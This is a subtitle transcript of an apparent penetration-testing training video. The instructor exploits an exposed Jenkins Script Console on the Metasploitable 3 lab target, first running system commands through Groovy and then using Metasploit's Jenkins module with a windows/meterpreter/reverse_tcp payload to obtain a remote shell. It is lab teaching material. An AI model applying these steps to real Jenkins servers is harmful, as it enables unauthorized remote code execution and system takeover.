1
00:00:00,360 --> 00:00:07,560
So we'll need to choose a service, and how do we do that? We list them, only the HTTP modules.

2
00:00:09,350 --> 00:00:13,490
You know, I always do forget to sort them, but that's easily remedied.

3
00:00:14,830 --> 00:00:20,620
And we can look for the service on 8484, so open up your browser.

4
00:00:23,050 --> 00:00:31,910
And type 10.10.2.10, colon, 8484, and that's what it looks like.

5
00:00:32,950 --> 00:00:36,220
So this is what's called a Jenkins application.

6
00:00:37,210 --> 00:00:45,340
It's pretty much a leading open-source automation server that provides building, deploying and automating

7
00:00:45,340 --> 00:00:53,500
any project, so you can look for anything vulnerable on the website, and that can give us a good start,

8
00:00:54,190 --> 00:00:58,660
or you can go back to the console and try to find an exploit.

9
00:00:59,650 --> 00:01:02,290
So let's just quickly check the links.

10
00:01:02,730 --> 00:01:03,790
Nothing here.

11
00:01:05,630 --> 00:01:06,440
Nothing here.

12
00:01:08,260 --> 00:01:09,070
Nothing here.

13
00:01:11,720 --> 00:01:12,860
And nothing here.

14
00:01:15,840 --> 00:01:17,670
So here are the menus.

15
00:01:18,950 --> 00:01:20,330
You can go ahead and examine them.

16
00:01:21,950 --> 00:01:32,660
But I want to call your attention to two menus here: System Information and Script Console. First, let's

17
00:01:32,660 --> 00:01:34,790
check into the System Information menu.

18
00:01:36,010 --> 00:01:37,750
Of course, it's going to be great information.

19
00:01:40,410 --> 00:01:47,280
If you don't know about Metasploitable 3, this is a perfect place to start so that you can enumerate

20
00:01:47,280 --> 00:01:48,150
the target system.

21
00:01:49,140 --> 00:01:50,700
All right, so now let's have a look.

22
00:01:50,990 --> 00:01:54,720
A deep dive, as it were, into the Script Console.

23
00:01:56,410 --> 00:01:59,290
And when you read all of this information provided,

24
00:02:00,510 --> 00:02:05,220
I hope that you picked up that you can execute some Groovy scripts from the console.

25
00:02:06,490 --> 00:02:13,470
Now, at this point, you might not know about Groovy. Can you execute system commands over Groovy,

26
00:02:14,200 --> 00:02:14,680
though?

27
00:02:15,580 --> 00:02:17,440
To find out, let's search.

28
00:02:18,350 --> 00:02:27,710
In a new tab, type "how to execute system commands from Jenkins script console".

29
00:02:30,090 --> 00:02:31,380
I just click on the first one.

30
00:02:32,860 --> 00:02:35,500
And here's an answer that gets a green check.

31
00:02:36,680 --> 00:02:37,750
Let's check the answer.

32
00:02:38,700 --> 00:02:40,680
I think there's another worry about that answer.

33
00:02:42,310 --> 00:02:49,150
So I'm going to copy this, and if you want to control it, we can execute it from the Script Console.

34
00:02:49,990 --> 00:02:51,880
So let's paste it and run it.

35
00:02:53,310 --> 00:02:55,890
I don't think there's going to be a problem with execution.

36
00:02:57,860 --> 00:03:01,580
So let's change the commands in the code.

37
00:03:03,230 --> 00:03:04,490
So, "ls".

38
00:03:05,750 --> 00:03:06,590
Executed.

39
00:03:07,670 --> 00:03:10,880
So let's change it to "ipconfig".

40
00:03:11,870 --> 00:03:14,510
And yeah, this is executed as well.

41
00:03:15,720 --> 00:03:16,250
"whoami"?

42
00:03:17,300 --> 00:03:17,960
OK.

43
00:03:19,770 --> 00:03:23,250
Now, I think that we found what we're looking for.

44
00:03:25,240 --> 00:03:30,520
So this obviously is going to take a lot of time, and let's say I don't even know Groovy that well,

45
00:03:30,820 --> 00:03:36,810
so you do need to find a reasonable exploit that can do all of this stuff for you.

46
00:03:36,850 --> 00:03:37,210
Right.

47
00:03:37,930 --> 00:03:39,730
So, in a new tab,

48
00:03:41,030 --> 00:03:47,810
let's have a search to see if there is an exploit for the Script Console, and naturally, Metasploit

49
00:03:47,810 --> 00:03:50,990
has an exploit module for this. Perfect.

50
00:03:52,240 --> 00:03:53,920
So now you can use this module.

51
00:03:55,280 --> 00:04:02,770
So let's go back to msfconsole and choose the Jenkins Script Console module as our exploit.

52
00:04:04,370 --> 00:04:05,270
Show options.

53
00:04:06,670 --> 00:04:18,550
Set our RHOST to 10.10.2.10, set our RPORT to 8484, set payload to windows/

54
00:04:20,090 --> 00:04:21,020
meterpreter/

55
00:04:23,190 --> 00:04:24,790
reverse_tcp.

56
00:04:26,280 --> 00:04:29,400
Set LHOST for the payload to Kali's IP.

57
00:04:30,580 --> 00:04:36,850
Set LPORT to 4443. Now show the options again.

58
00:04:38,410 --> 00:04:39,280
And then exploit.

59
00:04:41,440 --> 00:04:44,890
Oh, something went wrong.

60
00:04:45,700 --> 00:04:48,310
OK, so how are you going to fix it?

61
00:04:49,090 --> 00:04:55,180
Oh, yeah, you probably already saw: the problem is the TARGETURI variable.

62
00:04:56,400 --> 00:05:01,290
The URL of the Script Console page is just like that, so

63
00:05:02,310 --> 00:05:05,760
you should change its value to "script".

64
00:05:06,800 --> 00:05:10,280
I'm going to directly exploit without further control.

65
00:05:16,980 --> 00:05:21,780
And I think that's OK, and that's how you get the Meterpreter session.

66
00:05:22,500 --> 00:05:25,880
Don't forget, though: where am I, and who am I?

67
00:05:27,450 --> 00:05:33,960
And then we can send that session to the background, and let's have a look at the list of sessions.

68
00:05:34,880 --> 00:05:38,130
So you see, you have many sessions running on Metasploitable 3.

69
00:05:38,870 --> 00:05:42,290
All right, then let's go to the next service to exploit.